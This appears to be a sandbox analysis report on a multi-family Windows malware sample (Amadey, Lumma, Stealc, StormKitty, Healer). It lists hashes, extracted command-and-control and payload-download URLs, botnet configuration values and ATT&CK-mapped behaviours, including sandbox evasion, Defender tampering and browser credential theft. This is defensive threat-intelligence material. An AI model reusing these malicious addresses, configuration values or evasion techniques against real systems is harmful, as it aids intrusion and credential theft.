amadey | 3cef458436bf19de30f625d7e55c0d597eeace52c700f18597542b657e43e802

Analysis

max time kernel
100s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
31/03/2025, 00:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-03-31_f0d59ff93c834b4dd9c70423cf0d8ef4_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Size

938KB
MD5

f0d59ff93c834b4dd9c70423cf0d8ef4
SHA1

7633ab95e24c46b6568bd773257130757e1358fb
SHA256

3cef458436bf19de30f625d7e55c0d597eeace52c700f18597542b657e43e802
SHA512

12b177f57b181307f0da219697efafae7d63b49205ca52fd3b2d1b5a9b78a35f27fc4e7f62f9e074bf0c92d6ace86ebbbf79f83317486f3fc9382b1a9693232e
SSDEEP

24576:nqDEvCTbMWu7rQYlBQcBiT6rprG8a05u:nTvC/MTQYxsWR7a05

Score

10^/10

amadey healer lumma stealc stormkitty 092155 trump credential_access defense_evasion discovery dropper execution exploit persistence privilege_escalation spyware stealer trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://1travelilx.top/GSKAiz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://gstarcloc.bet/GOksAo

https://advennture.top/GKsiio

https://ntargett.top/dsANGt

https://spacedbv.world/EKdlsk

https://-galxnetb.today/GsuIAo

https://targett.top/dsANGt

https://starcloc.bet/GOksAo

https://qadvennture.top/GKsiio

https://galxnetb.today/GsuIAo

https://stardashn.shop/Gaiozn

https://5ironloxp.live/aksdd

https://jnavstarx.shop/FoaJSi

https://cosmosyf.top/GOsznj

https://esccapewz.run/ANSbwqy

https://travewlio.shop/ZNxbHi

https://touvrlane.bet/ASKwjq

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detects Healer an antivirus disabler dropper 2 IoCs

resource	yara_rule
behavioral2/memory/2468-1482-0x0000000000FA0000-0x0000000001406000-memory.dmp	healer
behavioral2/memory/2468-1480-0x0000000000FA0000-0x0000000001406000-memory.dmp	healer

Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral2/memory/3592-828-0x0000000000400000-0x0000000000444000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempADFRKSDIPJJWXMR0JE7SYKTAYYJZKG1E.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
15	2824	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1520	powershell.exe
4316	PowerShell.exe
828	powershell.exe
448	powershell.exe
2824	powershell.exe
1420	powershell.exe
1060	powershell.exe
3912	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 14 IoCs

flow	pid	Process
15	2824	powershell.exe
95	2120	futors.exe
124	2120	futors.exe
92	4548	rapes.exe
87	4548	rapes.exe
116	2120	futors.exe
33	4548	rapes.exe
33	4548	rapes.exe
33	4548	rapes.exe
33	4548	rapes.exe
33	4548	rapes.exe
33	4548	rapes.exe
108	2120	futors.exe
108	2120	futors.exe

Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
persistence privilege_escalation

AppInit DLLs
T1546.010

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
668	takeown.exe
2200	icacls.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 10 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
4840	chrome.exe
4332	chrome.exe
3504	chrome.exe
6336	msedge.exe
5624	msedge.exe
1728	chrome.exe
5400	chrome.exe
5988	msedge.exe
2012	msedge.exe
6428	msedge.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempADFRKSDIPJJWXMR0JE7SYKTAYYJZKG1E.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempADFRKSDIPJJWXMR0JE7SYKTAYYJZKG1E.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	nAM5wkr.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	futors.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	Bell_Setup16.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	221.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	221.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	TempADFRKSDIPJJWXMR0JE7SYKTAYYJZKG1E.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	rapes.exe

Executes dropped EXE 21 IoCs

pid	Process
4044	TempADFRKSDIPJJWXMR0JE7SYKTAYYJZKG1E.EXE
4548	rapes.exe
1732	h2kC2YI.exe
1936	SPOKz5U.exe
380	aezyEBW.exe
4456	apple.exe
2188	221.exe
1324	221.exe
1384	BCmr6Ki.exe
744	JmKitiE.exe
4444	nAM5wkr.exe
2916	xdwdkernel.exe
2348	amnew.exe
2120	futors.exe
2532	LKAGEY3.exe
4572	v7942.exe
4464	alex1dskfmdsf.exe
3828	Bell_Setup16.exe
960	Bell_Setup16.tmp
2472	Bell_Setup16.exe
312	Bell_Setup16.tmp

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine	TempADFRKSDIPJJWXMR0JE7SYKTAYYJZKG1E.EXE

Loads dropped DLL 8 IoCs

pid	Process
2916	xdwdkernel.exe
2744	Process not Found
4224	Process not Found
5104	Process not Found
3512	regsvr32.exe
3524	Process not Found
4016	Process not Found
1676	Process not Found

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2200	icacls.exe
668	takeown.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
141	ip-api.com
171	ipinfo.io
172	ipinfo.io

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000c000000023f61-1179.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
1048	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4044	TempADFRKSDIPJJWXMR0JE7SYKTAYYJZKG1E.EXE
4548	rapes.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 1732 set thread context of 2496	1732	h2kC2YI.exe	110
PID 1936 set thread context of 2836	1936	SPOKz5U.exe	113
PID 380 set thread context of 2176	380	aezyEBW.exe	115
PID 2532 set thread context of 4160	2532	LKAGEY3.exe	211
PID 4464 set thread context of 1836	4464	alex1dskfmdsf.exe	220

UPX packed file 33 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1352-667-0x00007FFE868E0000-0x00007FFE86ED0000-memory.dmp	upx
behavioral2/memory/1352-670-0x00007FFEA4B00000-0x00007FFEA4B19000-memory.dmp	upx
behavioral2/memory/1352-671-0x00007FFEA05A0000-0x00007FFEA05CD000-memory.dmp	upx
behavioral2/memory/1352-669-0x00007FFEA8620000-0x00007FFEA862F000-memory.dmp	upx
behavioral2/memory/1352-668-0x00007FFEA4570000-0x00007FFEA4594000-memory.dmp	upx
behavioral2/memory/1352-679-0x00007FFE913C0000-0x00007FFE91536000-memory.dmp	upx
behavioral2/memory/1352-678-0x00007FFEA04B0000-0x00007FFEA04D3000-memory.dmp	upx
behavioral2/memory/1352-682-0x00007FFEA0010000-0x00007FFEA0043000-memory.dmp	upx
behavioral2/memory/1352-681-0x00007FFEA6850000-0x00007FFEA685D000-memory.dmp	upx
behavioral2/memory/1352-680-0x00007FFEA1480000-0x00007FFEA1499000-memory.dmp	upx
behavioral2/memory/1352-687-0x00007FFEA4570000-0x00007FFEA4594000-memory.dmp	upx
behavioral2/memory/1352-686-0x00007FFE8A150000-0x00007FFE8A679000-memory.dmp	upx
behavioral2/memory/1352-688-0x00007FFEA06C0000-0x00007FFEA06D4000-memory.dmp	upx
behavioral2/memory/1352-689-0x00007FFEA4760000-0x00007FFEA476D000-memory.dmp	upx
behavioral2/memory/1352-690-0x00007FFE912A0000-0x00007FFE913BC000-memory.dmp	upx
behavioral2/memory/1352-684-0x00007FFE9C2C0000-0x00007FFE9C38D000-memory.dmp	upx
behavioral2/memory/1352-683-0x00007FFE868E0000-0x00007FFE86ED0000-memory.dmp	upx
behavioral2/memory/1352-710-0x00007FFEA1480000-0x00007FFEA1499000-memory.dmp	upx
behavioral2/memory/1352-735-0x00007FFE8A150000-0x00007FFE8A679000-memory.dmp	upx
behavioral2/memory/1352-745-0x00007FFE9C2C0000-0x00007FFE9C38D000-memory.dmp	upx
behavioral2/memory/1352-749-0x00007FFE912A0000-0x00007FFE913BC000-memory.dmp	upx
behavioral2/memory/1352-748-0x00007FFEA4760000-0x00007FFEA476D000-memory.dmp	upx
behavioral2/memory/1352-747-0x00007FFEA06C0000-0x00007FFEA06D4000-memory.dmp	upx
behavioral2/memory/1352-746-0x00007FFE868E0000-0x00007FFE86ED0000-memory.dmp	upx
behavioral2/memory/1352-744-0x00007FFEA0010000-0x00007FFEA0043000-memory.dmp	upx
behavioral2/memory/1352-743-0x00007FFEA6850000-0x00007FFEA685D000-memory.dmp	upx
behavioral2/memory/1352-742-0x00007FFEA1480000-0x00007FFEA1499000-memory.dmp	upx
behavioral2/memory/1352-741-0x00007FFE913C0000-0x00007FFE91536000-memory.dmp	upx
behavioral2/memory/1352-740-0x00007FFEA04B0000-0x00007FFEA04D3000-memory.dmp	upx
behavioral2/memory/1352-739-0x00007FFEA05A0000-0x00007FFEA05CD000-memory.dmp	upx
behavioral2/memory/1352-738-0x00007FFEA4B00000-0x00007FFEA4B19000-memory.dmp	upx
behavioral2/memory/1352-737-0x00007FFEA8620000-0x00007FFEA862F000-memory.dmp	upx
behavioral2/memory/1352-736-0x00007FFEA4570000-0x00007FFEA4594000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	TempADFRKSDIPJJWXMR0JE7SYKTAYYJZKG1E.EXE
File created	C:\Windows\xdwd.dll	nAM5wkr.exe
File opened for modification	C:\Windows\xdwd.dll	nAM5wkr.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3212	sc.exe
400	sc.exe
4128	sc.exe
4184	sc.exe
4804	sc.exe
1596	sc.exe
4280	sc.exe
3172	sc.exe
3828	sc.exe
3884	sc.exe
3840	sc.exe
448	sc.exe
1240	sc.exe
1796	sc.exe
4788	sc.exe
880	sc.exe
3296	sc.exe
1640	sc.exe
3488	sc.exe
2492	sc.exe
1452	sc.exe
380	sc.exe
4568	sc.exe
1832	sc.exe
2192	sc.exe
3680	sc.exe
3020	sc.exe
832	sc.exe
1464	sc.exe
3692	sc.exe
3540	sc.exe
1056	sc.exe
3384	sc.exe
4644	sc.exe
700	sc.exe
3916	sc.exe
3408	sc.exe
3504	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BCmr6Ki.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JmKitiE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PowerShell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-03-31_f0d59ff93c834b4dd9c70423cf0d8ef4_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempADFRKSDIPJJWXMR0JE7SYKTAYYJZKG1E.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1728	cmd.exe
4684	netsh.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2460	timeout.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
5628	taskkill.exe
5744	taskkill.exe
5808	taskkill.exe
5872	taskkill.exe
5940	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	nAM5wkr.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4068	schtasks.exe
3576	schtasks.exe
4392	schtasks.exe

Suspicious behavior: EnumeratesProcesses 43 IoCs

pid	Process
2824	powershell.exe
2824	powershell.exe
4044	TempADFRKSDIPJJWXMR0JE7SYKTAYYJZKG1E.EXE
4044	TempADFRKSDIPJJWXMR0JE7SYKTAYYJZKG1E.EXE
4548	rapes.exe
4548	rapes.exe
2496	MSBuild.exe
2496	MSBuild.exe
2496	MSBuild.exe
2496	MSBuild.exe
2836	MSBuild.exe
2836	MSBuild.exe
2836	MSBuild.exe
2836	MSBuild.exe
2176	MSBuild.exe
2176	MSBuild.exe
2176	MSBuild.exe
2176	MSBuild.exe
744	JmKitiE.exe
744	JmKitiE.exe
744	JmKitiE.exe
744	JmKitiE.exe
744	JmKitiE.exe
744	JmKitiE.exe
1836	MSBuild.exe
1836	MSBuild.exe
1836	MSBuild.exe
1836	MSBuild.exe
312	Bell_Setup16.tmp
312	Bell_Setup16.tmp
3512	regsvr32.exe
3512	regsvr32.exe
828	powershell.exe
828	powershell.exe
828	powershell.exe
4316	PowerShell.exe
4316	PowerShell.exe
4316	PowerShell.exe
3512	regsvr32.exe
3512	regsvr32.exe
448	powershell.exe
448	powershell.exe
448	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
656	Process not Found
656	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2824	powershell.exe
Token: SeDebugPrivilege	4444	nAM5wkr.exe
Token: SeDebugPrivilege	2916	xdwdkernel.exe
Token: SeIncBasePriorityPrivilege	2916	xdwdkernel.exe
Token: SeDebugPrivilege	828	powershell.exe
Token: SeIncreaseQuotaPrivilege	828	powershell.exe
Token: SeSecurityPrivilege	828	powershell.exe
Token: SeTakeOwnershipPrivilege	828	powershell.exe
Token: SeLoadDriverPrivilege	828	powershell.exe
Token: SeSystemProfilePrivilege	828	powershell.exe
Token: SeSystemtimePrivilege	828	powershell.exe
Token: SeProfSingleProcessPrivilege	828	powershell.exe
Token: SeIncBasePriorityPrivilege	828	powershell.exe
Token: SeCreatePagefilePrivilege	828	powershell.exe
Token: SeBackupPrivilege	828	powershell.exe
Token: SeRestorePrivilege	828	powershell.exe
Token: SeShutdownPrivilege	828	powershell.exe
Token: SeDebugPrivilege	828	powershell.exe
Token: SeSystemEnvironmentPrivilege	828	powershell.exe
Token: SeRemoteShutdownPrivilege	828	powershell.exe
Token: SeUndockPrivilege	828	powershell.exe
Token: SeManageVolumePrivilege	828	powershell.exe
Token: 33	828	powershell.exe
Token: 34	828	powershell.exe
Token: 35	828	powershell.exe
Token: 36	828	powershell.exe
Token: SeDebugPrivilege	4316	PowerShell.exe
Token: SeIncreaseQuotaPrivilege	4316	PowerShell.exe
Token: SeSecurityPrivilege	4316	PowerShell.exe
Token: SeTakeOwnershipPrivilege	4316	PowerShell.exe
Token: SeLoadDriverPrivilege	4316	PowerShell.exe
Token: SeSystemProfilePrivilege	4316	PowerShell.exe
Token: SeSystemtimePrivilege	4316	PowerShell.exe
Token: SeProfSingleProcessPrivilege	4316	PowerShell.exe
Token: SeIncBasePriorityPrivilege	4316	PowerShell.exe
Token: SeCreatePagefilePrivilege	4316	PowerShell.exe
Token: SeBackupPrivilege	4316	PowerShell.exe
Token: SeRestorePrivilege	4316	PowerShell.exe
Token: SeShutdownPrivilege	4316	PowerShell.exe
Token: SeDebugPrivilege	4316	PowerShell.exe
Token: SeSystemEnvironmentPrivilege	4316	PowerShell.exe
Token: SeRemoteShutdownPrivilege	4316	PowerShell.exe
Token: SeUndockPrivilege	4316	PowerShell.exe
Token: SeManageVolumePrivilege	4316	PowerShell.exe
Token: 33	4316	PowerShell.exe
Token: 34	4316	PowerShell.exe
Token: 35	4316	PowerShell.exe
Token: 36	4316	PowerShell.exe
Token: SeIncreaseQuotaPrivilege	4316	PowerShell.exe
Token: SeSecurityPrivilege	4316	PowerShell.exe
Token: SeTakeOwnershipPrivilege	4316	PowerShell.exe
Token: SeLoadDriverPrivilege	4316	PowerShell.exe
Token: SeSystemProfilePrivilege	4316	PowerShell.exe
Token: SeSystemtimePrivilege	4316	PowerShell.exe
Token: SeProfSingleProcessPrivilege	4316	PowerShell.exe
Token: SeIncBasePriorityPrivilege	4316	PowerShell.exe
Token: SeCreatePagefilePrivilege	4316	PowerShell.exe
Token: SeBackupPrivilege	4316	PowerShell.exe
Token: SeRestorePrivilege	4316	PowerShell.exe
Token: SeShutdownPrivilege	4316	PowerShell.exe
